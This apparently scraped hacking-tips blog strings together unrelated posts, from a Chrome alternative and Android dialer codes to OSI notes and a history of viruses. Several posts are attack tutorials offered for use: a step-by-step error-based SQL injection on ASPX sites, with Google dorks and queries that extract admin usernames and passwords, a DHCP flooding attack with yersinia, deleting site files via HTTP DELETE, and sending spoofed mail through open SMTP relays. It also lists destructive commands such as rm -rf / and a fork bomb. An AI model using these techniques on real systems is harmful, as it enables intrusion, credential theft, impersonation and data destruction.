Alternative to Google Chrome

Alternative to Google Chrome : SRWare

If you have privacy concerns and beloved google chrome bothers you about privacy,Well this is for you all

SRWare Iron: The Browser of the future

- Overview - News - Chrome vs Iron - FAQ (frequently asked questions) - Download   SRWare Iron: The browser of the future - based on the free Sourcecode "Chromium" - without any problems at privacy and security Google's Web browser Chrome thrilled with an extremely fast site rendering, a sleek design and innovative features.  But it also gets critic from data protection specialists , for reasons such as creating a unique user ID or the submission of entries to Google to generate suggestions. SRWare Iron is a real alternative. The browser is based on the Chromium-source and offers the same features as Chrome - but without the critical points that the privacy concern. We could therefore create a browser with which you can now use the innovative features without worrying about your privacy. We want our users to participate in our work and make the browser free to download under the name "SRWare Iron" into the net. What does Iron makes different? Read here. * Chrome and Google are registered trademarks of Google Inc.

Secret Codes For Android

Secret Codes For Android 

1. Complete Info About your Phone

*#*#4636#*#*

This code can be used to getsome interesting information about your phone and battery. It shows following 4 menus on screen:
Phone information
Battery information
Battery history
Usage statistics

2. Factory data reset

*#*#7780#*#* .

This code can be used for a factory data reset. It'll remove following thing
Google account settings stored in your phone
System and application data and settings
Downloaded apps.. It'll NOT remove: Current system software and bundledapplication
SD card files e.g. photos, music files, etc.
Note: Once you give this code, you get a prompt screen asking you to click on "Reset phone" button. So you get a chance to cancel your operation.

3. Format your Android.
*2767*3855#

Think before you give this code. This codeis used for factory
format. It'll remove all files and settings including the internal memory storage. It'll also reinstall thephone firmware.

Note: Once you give this code, there is no way to cancel the operation unless you remove the battery from the phone. So think twice before giving this code.

4. Phone Camera Update

*#*#34971539#*# *

This code is used to get information about phone camera. It shows following 4
menus:
1. Update camera firmware in image (Don't try this option)
2. Update camera firmware in SDcard
3. Get camera firmware version
4. Get firmware update count

WARNING: Never use the first option otherwise your phone camera will stop
working and you'll need to take your phone to service center to reinstall camera firmware.

5. End Call/Power

*#*#7594#*#*

This one is my favorite one. This code can be used to change the "End Call / Power" button action in your phone. Be default, if you long press the button, it
shows a screen asking you to select any option from Silent mode, AirPlane mode and Power off. You can change this action using this code. You can enable direct power off on this button so you don't needto waste your time in selecting the option.

6. File Copy for Creating Backup

*#*#273283*255* 663282*#*#*

This code opens a File copy screen where you can backup your media files e.g. Images, Sound, Video and Voice memo.

7. Service Mode

*#*#197328640#* #*
This code can be used to enter into Service mode. You can run various tests and change settings in the service mode.

8. WLAN, GPS and Bluetooth Test Codes:
*#*#232339#*#* OR*#*#526#*#* OR*#*#528#*#* - WLAN test (Use
"Menu" button to start various tests)

*#*#232338#*#* - Shows WiFi MAC address

*#*#1472365#*#* - GPS test

*#*#1575#*#* - Another GPS test

*#*#232331#*#* - Bluetooth test

*#*#232337#*# - Shows Bluetooth device address

9. Codes to get Firmware version information:

*#*#4986*265046 8#*#* - PDA, Phone, H/W, RFCallDate

*#*#1234#*#* - PDA and Phone

*#*#1111#*#* - FTA SW Version

*#*#2222#*#* - FTA HW Version

*#*#44336#*#* - PDA, Phone, CSC, Build Time, Changelist number

10. Codes to launch various Factory Tests:

*#*#0283#*#* - Packet Loopback

*#*#0*#*#* - LCD test

*#*#0673#*#* OR*#*#0289#*#* - Melody test

*#*#0842#*#* - Device test (Vibration test and BackLight test)

*#*#2663#*#* - Touch screen version

*#*#2664#*#* - Touch screen test

*#*#0588#*#* - Proximity sensor test

*#*#3264#*#* - RAM version

*USE AT YOUR OWN RISK*

Hack a DHCP Server

How To Hack a DHCP Server

What is DHCP?
Dynamic Host Configuration Protocol ( DHCP ) is a
network protocol that enables a server to automatically
assign an IP address to a computer from a defined
range of numbers (i.e., a scope) configured for a given
network.
DHCP work on DORA concept.
1. Client makes a UDP Broadcast to the server with a
DHCPDiscover, or Discover packet.
2. DHCP offers to the client. The server sends a
DHCPOffer including other configuration parameters
(DHCP Options) for the client per the servers
configuration file
3. In response to the offer Client requests the server.
The client replies DHCPRequest, unicast to the server,
requesting the offered address.
4.The server sends DHCP Ack acknowledging the
request which is the clients final permission to take the
address as offered. Before sending the ack the server
double checks that the offered address is still available,
that the parameters match the clients request and (if
so) marks the address taken.
Attack on DHCP Server :-
Open the Kali Linux terminal and type the command
root@kali:~#yersinia -G to open the GUI interface of
yersinia.
now click on the Launch Attack option and select the
DHCP option.
now select the Sending DISCOVER packet option for
your attack.and click on the OK.
now it will start the attack on DHCP server , it will send
ton of packets on your DHCP server within second.
With Yersinia , you are able to attack on CDP , DHCP ,
802.1Q , 802.1X ,DTP , HSRP, ISL , STP and VTP
protocols.
Countermeasures or Mitigation :-
You need to be enable DHCP Snooping on the Cisco
Switches:-
DHCP snooping allows the configuration of ports as
trusted or untrusted
Untrusted ports cannot process DHCP replies
Configure DHCP snooping on uplinks to a DHCP
server
Do not configure DHCP snooping on client ports.
Configuring DHCP Snooping

Note :- This Tutorial is for Education Purpose only.

-H4ckz

Compress Large Files

How To Compress Large Files Using Winrar

WinRAR is a powerful archive manager. It can backup your data and reduce size of email attachments, decompress RAR,ZIP and other files downloaded from Internet and create new archives in RAR and ZIP file format.
You can download the trial version of the software at rarlab. com

To compress large file using Winrar follow simple steps given below:

Step 1: Select and Right click on the file you want to Compress and select Add to Archive option.

Step 2: A window will pop up with various options. In Archive name field type the name of your archive manually in the text box provided below.
Step 3: When creating a new archive, you first need to select the archive format.
ZIP is preferable when you are not sure that a receiver of your archive has WinRAR.
Otherwise just select RAR, since it provides more options and higher compression.
Step 4: There are six compression methods supported: "Store", "Fastest", "Fast", " Normal", "Good" and "Best".
The Best method provides high, but slow compression.
Fastest method compresses poorly, but it is very fast. Store method just merges files into an archive without any compression.
If you want to create an archive for distribution or for long storage,
It would be best to probably ignore the time constraint and choose the Best compression method to reduce the size as much as possible.
But for daily backups choose Normal compression method.
Step 5: At the bottom there is a Tab saying “ Split to Volume, Bytes” In the box enter a figure or you can use the drop down menu to make your choice.
Remember you have to enter the value in bytes, kilobytes or megabytes and this applies only to .rar extension. (1024 KB equals 1 MB)
In the example below, I have chosen 98078 KB which comes to around 95.77 MB.
Step 6: When you have chosen the right options for your archive, click the OK button.
-HAckz

Deadly Commands In Linux

Deadly Commands In Linux

1. rm -rf /  = Will Delete Everything.

Explanation:
 rm : Removes the files.
-rf : This Command will Run rm and will delete all files and folders without promting you
/ : This command will tell rm to start from root directory ie: all files on your computer including removable Drives.


________________________________________
2. :(){ :|: & };: = This Line Looks Simple but its Dangerous , Bash Function.
It Defines Shell Function that will Create New Copies Of Itself . This Process will Continue and Freeze Your Computer. It Can also be Called as Danial-of-Server Attack.


________________________________________
3. mkfs.ext4 /dev/sda1 = This Command will Format Your Hard drive

Explanation:
mkfs.ext4 : This part of command will create a new ext4 file system on following device.
/dev/sda1 : This part specifies the 1st partition on the 1st hard drive which is probably in use.

Similarly, This Command >  mkfs.ext3 /dev/sdb2  will Format the 2nd partition on the 2nd Hard drive with ext3 File system.


________________________________________
4. command > /dev/sda – This Command will Write Directly to a Hard Drive.
It Runs The command and sends the output of the command directly to Hard drive, writing the data to a Hard drive and Damaging your System.

Explanation:
command : Runs any Command
> : Sends the Output of the command to the following location.
/dev/sda : This command writes the output of the command directly to the hard disk.


________________________________________
5. mv ~ /dev/null – This Command Will Move your Home Directory To Black hole.
Consider /dev/null as Black hole here, moving anything to /dev/null is Gone Forever. Hence mv ~ /dev/null  will send all your personal files into black hole.

Explanation:
mv : moving following files to Another location.
~ :  This Represents your Entire Home Folder.
/dev/null : moves your home folder , Destroys all your files and deletes the original copy.
- See more at: http://www.geekofreak.com/2013/07/deadliest-commands-for-linux-that-you.html#sthash.2Gk3tq3Y.dpuf

How To Delete Files Of A Website

How To Delete Files Of A Website 

There is a way to delete files of a website with the help of the http [hyper text transfer protocol] but this security hole is mostely
closed, this hole is caused by stupid administrators which can't configure there apache or iis or any other http server

4-1-1 - HTTP

The http exists since 1990, before this time the internet was used to make a file exchange with the ftp or to get in mailboxes where you can write messages or many other things, with the http and html [hyper text mark language] the www_clients like netscape or ie can interprete this hyper text to display informations or other things like you know, but what the user can't see when he uses such a client that the http follows also the request_answer_play, the client requests informations with a special command, which i will explain beside others later, and the http server answers with the requested informations, this requests or answers are http messages which could be simple_request or simple_response or full_request or full_response, the simple http_messages based on http/0.9 and the full messages on http/1.0, but the difference between this messages is very small, except the one of html/0.9 and html/1.0

1 - get [address], the address is the whole like http://www.target.com/index.html this command requests the informations [the code] in this file and if the file is a cgi it have to be executed and the produced informations will be send to client the difference between this simple_request and the full_request is that the full_request ends with http/1.0 like this : [get http://www.target.com/index.html http/1.0]

2 - head [addy], it have to be a complete addy too, the small difference between this command and the get command is that this command only meta_tags and the other informations in the title tag

3 - post [addy], this is used for bigger data it is mostley used for data which have to be send to a program

4 - put [addy], with put you send data to the server like html documents and this data is saved under the addy

5 - delete [addy], this is the opposite of put so it deletes the data which you have specified with the addy

4-1 - How To Delete Files Of A Website
With your instinct you have discovered that there is a security hole, the http protocol today is used in combinition with the ftp, so that means ftp is used by webmasters to upload their files and http is used by the client to resolve these site, but in former times concrete, at the development of the http the developers aimed to make it easier to upload files, so not with the ftp and that means without a special ftp-client, so they created a command to upload and delete files on a webserver, but the problem is that the http didn't use an authentication but ftp does, so that means that the most administrators disabled these commands to shut a security hole, but there are not only experienced admins out there but stupid too, so there is still such a hole which waits to be used, how ever telnet is an excellent simple tool, so if you want to use this security hole connect to the destination hostname or ip [you can use a hostname because dns will be used to resolve the ip] on port 80, i have showed you guys how to do it, when the connection is established you can use the commands which are discribed.

*USE AT YOUR OWN RISK*

Telnet

What is Telnet ? 

Most of you only know that telnet is a Port [Port 23] or that telnet is a remote control tool, remote control means in this aspect that you as client can get a connection to for example a telnet server and then you can write commands in a derivate of a shell and these commands are executed only on this server not on your machine, but i want to show all you guys how to use this simple remote control tool in several ways, because this simpleness is brilliant, so hope i answered this question and if you are interested in go on and read if not stop reading and go pissing2 - How To Use Telnet ?

Telnet is a text based tool, so if you want to connect to the destination [128.62.254.12] write: 'telnet 128.62.254.12 23', so you see at first there is the command telnet to start the telnet client, the next is the destination address and last is the port, you know the telnet port 23, so i hope now you can use telnet3 - How To Send Anonymous Mails ?
3-1 - SMTP

Yes first i have to say somehting about the smtp [simple mail transfer protocol], the standard is written down in the rfc 821 [rfc = request for comments] it goes back to the year 1982, this rfc defines the commands which could be used These commands :

1 - HELO [client adress or name], it marks the begin of that telnet session and sends your name or address to the smtp server

2 - MAIL FROM [your mail addie], with this command you send your mail addie to server is also written in the e-mail as sender

3 - RCPT TO [recipient], with this command you define the recipient

4 - DATA, this marks the begnning of the e-mail if the server sends an ack [ackwoledge] you can begin to write the message

5 - RSET, reset this establishs the initial stage and the connection is canceled

6 - NOOP, no operation so it means that nothing is done

7 - QUIT, this is the ending of the smtp connection

But this are only the most important commands many commands have been added in this time after the rfc has defined them

EXPN, expand with this command maillist support will be available
VRFY, verify this command requests the confirmation of the recipient address
Caused of this addition them smtp is also called esmtp which means Extended smtp

3-2 How To Use SMTP To Send Anonymous Mails
First you have to find a free accessable smtp server, caused by spaming many servers has secured their systems like gmx with [smtp after pop] which means that at first you have to login at pop with your username and password for your gmx e-mail addie, after that the srever saves your ip for a special time in which you can connect to smtp server to send mails, freenet uses another secured system, this smtp server denies special recepient addies, so you have to search a free accessable mail server with out such secured servers, they exists, so after you have found such a server you can write in your shell : [telnet <serveraddy> 25] then your client connects to it, here is a complete telnet session :

Connected to mail.gmx.net.
220 {mp015-rz3} GMX Mailservices ESMTP
HELO www.The-Netrix.net
250 {mp015-rz3} GMX Mailservices
MAIL FROM:LinusTorvalds@linux.org
250 ... Sender Okay
RCPT TO:Bgate@microsoft.com
250 ... Recipient Okay
DATA
354 Enter mail, end with "." on a line by itself
Operating Systems are like sex, you have the best if it is free
.
250 Mail accepted
QUIT
221 mail.gmx.net closing connection
Connection closed by foreign host.

First your client trys to connect to the mail server, as sign that the connection is established the server answers with a command like that, then you say hello to the server with the command [HELO] and your machines name, next is another answer from server which is unimportant, after it you send your mail addy to server with the command [MAIL FROM:] followed by your addy, then the server check this addy and if it's ok he will inform you about it, next he expects the recipient and you won't let him wait with the command [RCPT TO:] followed by the addy of the recipient, if it's also ok you can start to write your mail after the command [DATA] which is followed by the ack of the server and the text or character which marks the end of the mail, then you write your mail
and end it how the server expect it, if the mail is ok the server will inform you for the last time in this session, after it there is no cause which should hold your connection so you will end it with [QUIT] and the server will send a last stupid message as sign that the connection is closed

Vulnerabilities Website

Types of Web Vulnerabilities 

[x] PHP code injection
[x] PHP curl_exec() url is controlled by user
[x] PHP invalid data type error message
[x] PHP preg_replace used on user input
[x] PHP unserialize() used on user input
[x] Arbitrary File Deletion
[x] Code Execution Hacking(LFI,RFI,Iframe Injection, Remote Code Execution)
[x] Cookie Manipulation (Meta HTTP-EQUIV & CRLF Injection)
[x] CRLF Injection (HTTP response splitting & Headers Injection)
[x] Cross Frame Scripting ( XFS )
[x] Cross-Site Scripting ( XSS - Persistent, Non-Persistent, DOM Based)
[x] Directory traversal including shell uploading
[x] Microsoft Office possible sensitive information
[x] Possible internal IP address disclosure
[x] Possible server path disclosure (Unix and Windows)
[x] Possible username or password disclosure
[x] Sensitive data not encrypted
[x] Source code disclosure
[x] Cross-Site Request Forgery (CSRF)
[x] Email Injection
[x] File Inclusion (LFI,RFI with and without null byte)
[x] Full Path Disclosure
[x] LDAP Injection
[x] Remote XSL inclusion
[x] Script source code disclosure
[x] Server-Side Includes (SSI) Injection
[x] Structured Query Language Injection(SQL Injection)
[x] URL Redirection
[x] XPath Injection vulnerability
[x] EXIF
[x] Buffer Overflows
[x] Clickjacking
[x] Dangling Pointers
[x] Format String Attack
[x] FTP Bounce Attack
[x] Symlinking and Server Rooting
[x] Blind SQL injection (timing - Boolean Based)
[x] Blind SQL Injection (Blind SQL String Based and Double Query Blind Based)
[x] 8.3 DOS Filename Source Code Disclosure
[x] Search for Backup files
[x] Cross Site Scripting in URI
[x] PHP super-globals-overwrite
[x] Script errors (such as the Microsoft IIS Cookie Variable Information Disclosure)
[x] WebDAV (very vulnerable component of IIS servers)
[x] Application error message
[x] Check for common files
[x] Directory Listing
[x] Email address found
[x] Local path disclosure
[x] Possible sensitive files

OSI Layers

7 Layers of OSI

The ISO (International Organization for Standardization) decided to construct a framework of standards in which different vendors would be able to use in order to communicate over a network consisting of diverse equipment and applications.  This framework is now considered the standard for communication of networks.  The OSI is divided into 7 layers, which divides the task into smaller more manageable task groups.  Each task or group of tasks assigned to each layer can also be implemented independently.  This limits complications between layers because the solutions offered by one layer do not adversely affect the other layers.

The 7 layers can be split logically into two subgroups.  Layers 7 thru 4 focus on the end to end communication of data source and destinations.  Layers 3 thru 1 are provide consistent communication between the network devices.  An easier way of looking at the OSI model is dividing the upper layers (7, 6, 5) from the lower layers (4, 3, 2, 1).  The upper layers deal with application issues and are implemented only in software.  The highest layer, the application layer, is the closest to the end user.  The lower layers are responsible for the transportation of the data.  The physical layer and the data link layer are implemented in hardware and software. The lowest layer, the physical layer, is closest to the physical network medium (the wires, for example) and is responsible for placing data on the medium.

The following is a top-down explanation of the OSI Model. It starts with the user's PC and it follows what happens to the user's file as it passes though the different OSI Model layers. The top-down approach was selected specifically (vs. starting at the Physical Layer and working up to the Application Layer) for ease of understanding. It is used here to show how the user's files are transformed (through the layers) into a bit stream for transmission on the network.

LAYER 7 - APPLICATION

The application level provides services that directly support the user applications, such as user interface, e-mail, file transfer, database access, etc. There are many protocols at this layer that are commonly needed such as HTTP, WWW, FTP, TELNET, SMTP. It gives applications access to the network through the layers below. Another important function is file transfer between computers. Some computers store file names or represent text lines differently. The application layer takes care of the incompatibilities and allows a smooth transfer between systems.
Protocols: FTP1, HTTP2, SMTP3, DNS4, TFTP5, NFS6, TELNET7.

LAYER 6 - PRESENTATION

The presentation level is translator between the application and network format. Unlike the lower layers, its concern is with the syntax and semantics of the information transmitted. Most user programs do not exchange random binary bit strings. They exchange data such as names, addresses, dates, etc. Different computers store the data in a different way. In order to allow these computers to transmit the data to each other the presentation layer translates the data into a standard form to be used on the network. Another function is data compression which can be used to reduce the number of bits needed to send the packet of information. Security is also added at this layer by using data encryption and decryption. This prevents others from intercepting the data and being able to decipher the meaning of the bits.
Protocols: ASCII8, EBCDIC9, MIDI10, MPEG11, JPEG12.

LAYER 5 - SESSION

 This layer allows applications on connecting systems to communicate using a session. It opens, uses, and closes this communication link. It also acts as a dialog control mechanism controlling who is able to transmit. Sessions can allow data to be sent in both directions at the same time or only one direction. The session layer determines who has the ability to transfer at the current time. Another valuable ability is to insert checkpoints during data transfers. During a large file transmission if the system crashes the checkpoints allow the system to start downloading at the last known checkpoint. An example of this is during either a interactive login or file transfer connection, the session would recognize names in the session and register them into a history. It could then connect and reconnect in case of a system crash at either of the systems.
Protocols: SQL13, RPC14.

LAYER 4 - TRANSPORT

 The basic function of the transport layer is to accept data from the session layer, break up the data into smaller units if need be, and send these manageable data packets to the network layer. At the destination this layer is responsible for combining the packets into their original state. This layer also checks to see if the layers are in the right order when received and not in duplicated form. If there is an error in one of the packets there is a request for that packet's retransmission. There are two protocols that sit at this layer. First, the TCP protocol connects the sender and the receiver using a socket which is determined by the IP address and port number. TCP keeps track of the packet delivery order and which ones need to be resent. UDP on the other hand is a connectionless communication and does not guarantee packet delivery between sender and receiver. Because it is connectionless the sender sends the data into the network with an IP address of the receiver and hopes it makes it to its destination. Since there is not a way of asking the sender to retransmit because of an error there is little error protection if any.
Protocols: TCP15 or UDP16.



LAYER 3 - NETWORK
The network layer basically handles all of the addressing issues. This layer addresses packets, determines the best path or route, and manages network problems such as data congestion. There are three ways in which the packets are routed to their destinations. First, there could be a static route through the entire network that will never be changed. Second, there could be a static line only used during a particular session between the sender and receiver. Finally, the packets could be dynamically sent through the network using changing paths in order to prevent bottlenecks. The bottlenecks are formed when there are too many packets present in one subnet causing them to get in each other's way. The network level is also responsible for converting the network address and names to the MAC addresses of the machines. One of the most important functions of this layer is the ability to allow two different networks using conflicting addressing schemes to be able to send data to each other. The network layer allows the different protocols to "talk" to each other and understand where the packet's destination is.  Routers work at this level by sending the packets along the network.
Protocols: IP17, ICMP18, ARP19, PING20, Traceroute21.

LAYER 2 - DATA LINK

The data link layer defines the format of data on the network. All of the data sent through the network are made into a frame which is performed at this level. The frame is a uniform way of sending the data along with address information and error checking capabilities. CRC is used for the error detection at this level. If at the receiving end the CRC fails at this level there is a request back to the sender for retransmission of this packet.
Protocols: IEEE 802.222, 802.323, 802.524.

LAYER 1 - PHYSICAL

 The physical layer is responsible for establishing, maintaining and ending physical connections (point to point) between computers. This layer is concerned with the actual interpretation of the bit stream into an electrical signal that can be carried across a physical medium. The protocols at this layer deal with the binary transmission, voltage levels, and data rates. This layer would also specify physical medium properties such as cables and network cards.
Protocols: IEEE 802.323, 802.524.

-by Kali Linux

Hack Website

Hacking Aspx websites

 how to make a injection on a aspx based website.

1) seach aaspx website.
for this step you can use one of this dorks
".aspx?bookID="
".aspx?cart="
".aspx?cartID="
".aspx?catalogid="
".aspx?category_list="
".aspx?CategoryID="
".aspx?catID="
".aspx?cid="
".aspx?code_no="
".aspx?code="
".aspx?designer="
".aspx?framecode="
".aspx?id="
".aspx?idcategory="
".aspx?idproduct="
".aspx?intCatalogID="
".aspx?intProdId="
".aspx?item_id="
".aspx?item="
".aspx?itemID="
".aspx?maingroup="
".aspx?misc="
".aspx?newsid="
".aspx?order_id="
".aspx?p="
".aspx?pid="
".aspx?ProdID="
".aspx?product_id="
".aspx?product="
".aspx?productid="
".aspx?showtopic="
".aspx?Sku="
".aspx?storeid="
".aspx?style_id="
".aspx?StyleID="
".aspx?userID="
".aspx?Id="

2) If you found one lets check if the website is vulnverable. Add this text after the url
"order by 1--"
example : http://www.target.com/index.aspx?Id=1 order by 1--
Now you will get a Error : "Page not found" or something like that.

3) Lets go on and begin with the Injection the first step of every injection is to find out the columns.
for this step we use :
"having 1=1"
you only have to copy it behind the url
example : http://www.target.com/index.aspx?Id=1 having 1=1

4) Well lets go on and search the tables. Use this code for it
and 1=convert
example : http://www.target.com/index.aspx?Id=1 and 1=convert
The output is the first table of the databse. But this table don't helps you .
You need to find the admin table.
Use this query to get the next table :
"and 1=convert
(int,(select top 1 table_name from information_schema.tables where
table_name not in ('Tab_FinalOrder')))"

example : http://www.target.com/index.aspx?Id=1 and 1=convert
(int,(select top 1 table_name from information_schema.tables where
table_name not in ('Tab_FinalOrder')))

Now we get the name of the admin table. The Admintable name is in this example "Administration"

5) Now lets get into the table Administration
use this query for it:
and 1=convert

"(int,(select top 1 column_name from information_schema.
columns where table_name = 'AdminMaster'))"

example : http://www.target.com/index.aspx?Id=1 and 1=convert
(int,(select top 1 column_name from information_schema.
columns where table_name = 'AdminMaster'))

6) Our results are the tables "AdminName" and "AdminPassword"
Now have dont the most part of this injection. The last step is to find out Adminname and Adminpassword.

Query for Admin name :
"and 1=convert(int,(select top 1 AdminName from Administration))"
example : http://www.target.com/index.aspx?Id=1 and 1=convert(int,(select top 1 AdminName from Administration))

Query for Admin pass :
"and 1=convert(int,(select top 1 AdminPassword from Administration))"
example : http://www.target.com/index.aspx?Id=1 and 1=convert(int,(select top 1 AdminPassword from Administration))

7) So now your are nearly finish. You only need to find out the Admin Login Pannel.

Setup open VPN

How to Setup FreevpnMe using openVPN

1. Download openVPN from here
2. install openVPN client
3. Get FreeVPNme Credenitals and clientbundle from here
4. extract the clientbundle and copy the configuration files
5. open C:\programfiles\openvpn\config [paste the file in this directory\
6. right click opnvpn tray icon ,It will list all the connections used in the clientbundle
7. select one and click connect 
8. provide username and password 
9. thats it , youre done.Enjoy

Hack T-REX Game Chrome

On console  press F12

Runner.Prototype

var deafaultRunner =Runner.prototype.game0ver  //taking bkp

Runner.prototype.game0ver = function(){console.log("sdsdsdsd")}   //ghost dino

Runner.Instance_.setSpeed(1500)  //Speed

Runner.Prototype.game0ver = deafaultRunner

* Here what we do is Simply replacing the game0ver Function *

eg Config:

Runner.config = {
  ACCELERATION: 0.001,
  BG_CLOUD_SPEED: 0.2,
  BOTTOM_PAD: 10,
  CLEAR_TIME: 3000,
  CLOUD_FREQUENCY: 0.5,
  GAMEOVER_CLEAR_TIME: 750,
  GAP_COEFFICIENT: 0.6,
  GRAVITY: 0.6,
  INITIAL_JUMP_VELOCITY: 12,
  MAX_CLOUDS: 12,
  MAX_OBSTACLE_LENGTH: 1,
  MAX_SPEED: 12,
  MIN_JUMP_HEIGHT: 35,
  MOBILE_SPEED_COEFFICIENT: 1.2,
  RESOURCE_TEMPLATE_ID: 'audio-resources',
  SPEED: 6,
  SPEED_DROP_COEFFICIENT: 3
};

exploit SQL servers

10 methods to exploit SQL servers :

Whether it is through manual poking and prodding or the use of securitytools, malicious attackers employ a variety of tricks to break into SQL server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.testing

1. Direct connections via the Internet
These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield?s Port Report shows just how many systems are sitting out there waiting to be attacked. I don?t understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.

2. Vulnerability scanning
Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or thedatabase system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assesment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.?s NGSSquirrel for SQL Server (for database-specific scanning). They?re easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.

3. Enumerating the SQL Server Resolution Service
Running on UDP port 1434, this allows you to find hidden database system. Chip Andrews? SQLPing v 2.5 is a great tool to use to look for SQL server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren?t listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.

4. Cracking SA passwords
Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS software Ltd. also have this capability.

5. Direct-exploit attacks
Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.

6. SQL injection
SQL injection attacks are executed via front-end Web applications that don?t properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informativeprefer to perform the follow-through using an automated tool, such as SPI Dynamics? SQL Injector.

7. Blind SQL injection
These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn?t receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that?s

8. Reverse engineering the system
The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you?ll find a discussion about reverse engineering ploys.

9. Google hacks
Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors ? such as ?Incorrect syntax near? ? leaking from publicly accessible systems. Several Google queries are available at Johnny Long?s Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web Servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google?s ?site:? operator often turns up juicy info you never imagined you could unearth.

10. Perusing Web site source code
Source Code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.

Enjoy !
-Shubham.

Evolution Of Computer Viruses and Worms

part 1


Like any other field in computer science, viruses have evolved -a great deal indeed- over the years. In the series of press releases which start today, we will look at the origins and evolution of malicious code since it first appeared up to the present.

Going back to the origin of viruses, it was in 1949 that Mathematician John Von Neumann described self-replicating programs which could resemble computer viruses as they are known today. However, it was not until the 60s that we find the predecessor of current viruses. In that decade, a group of programmers developed a game called Core Wars, which could reproduce every time it was run, and even saturate the memory of other players’ computers. The creators of this peculiar game also created the first antivirus, an application named Reeper, which could destroy copies created by Core Wars.

However, it was only in 1983 that one of these programmers announced the existence of Core Wars, which was described the following year in a prestigious scientific magazine: this was actually the starting point of what we call computer viruses today.

At that time, a still young MS-DOS was starting to become the preeminent operating system worldwide. This was a system with great prospects, but still many deficiencies as well, which arose from software developments and the lack of many hardware elements known today. Even like this, this new operating system became the target of a virus in 1986: Brain, a malicious code created in Pakistan which infected boot sectors of disks so that their contents could not be accessed. That year also saw the birth of the first Trojan: an application called PC-Write.

Shortly after, virus writers realized that infecting files could be even more harmful to systems. In 1987, a virus called Suriv-02 appeared, which infected COM files and opened the door to the infamous viruses Jerusalem or Viernes 13. However, the worst was still to come: 1988 set the date when the “Morris worm” appeared, infecting 6,000 computers.

From that date up to 1995 the types of malicious codes that are known today started being developed: the first macro viruses appeared, polymorphic viruses … Some of these even triggered epidemics, such as MichaelAngelo. However, there was an event that changed the virus scenario worldwide: the massive use of the Internet and e-mail. Little by little, viruses started adapting to this new situation until the appearance, in 1999, of Melissa, the first malicious code to cause a worldwide epidemic, opening a new era for computer viruses.



part 2


This second installment of ‘The evolution of viruses’ will look at how malicious code used to spread before use of the Internet and e-mail became as commonplace as it is today, and the main objectives of the creators of those earlier viruses.
Until the worldwide web and e-mail were adopted as a standard means of communication the world over, the main mediums through which viruses spread were floppy disks, removable drives, CDs, etc., containing files that were already infected or with the virus code in an executable boot sector.

When a virus entered a system it could go memory resident, infecting other files as they were opened, or it could start to reproduce immediately, also infecting other files on the system. The virus code could also be triggered by a certain event, for example when the system clock reached a certain date or time.  In this case, the virus creator would calculate the time necessary for the virus to spread and then set a date –often with some particular significance- for the virus to activate. In this way, the virus would have an incubation period during which it didn’t visibly affect computers, but just spread from one system to another waiting for ‘D-day’ to launch its payload. This incubation period would be vital to the virus successfully infecting as many computers as possible.

One classic example of a destructive virus that lay low before releasing its payload was CIH, also known as Chernobyl. The most damaging version of this malicious code activated on April 26, when it would try to overwrite the flash-BIOS, the memory which includes the code needed to control PC devices. This virus, which first appeared in June 1998, had a serious impact for over two years and still continues to infect computers today.

Because of the way in which they propagate, these viruses spread very slowly, especially in comparison to the speed of today’s malicious code. Towards the end of the Eighties, for example, the Friday 13th (or Jerusalem) virus needed a long time to actually spread and continued to infect computers for some years. In contrast, experts reckon that in January 2003, SQLSlammer took just ten minutes to cause global communication problems across the Internet.

Notoriety versus stealth

For the most part, in the past, the activation of a malicious code triggered a series of on screen messages or images, or caused sounds to be emitted to catch the user’s attention.  Such was the case with the Ping Pong virus, which displayed a ball bouncing from one side of the screen to another. This kind of elaborate display was used by the creator of the virus to gain as much notoriety as possible. Nowadays however, the opposite is the norm, with virus authors trying to make malicious code as discreet as possible, infecting users’ systems without them noticing that anything is amiss.



pat 3


This third installment of ‘The evolution of viruses’ will look at how the Internet and e-mail changed the propagation techniques used by computer viruses.

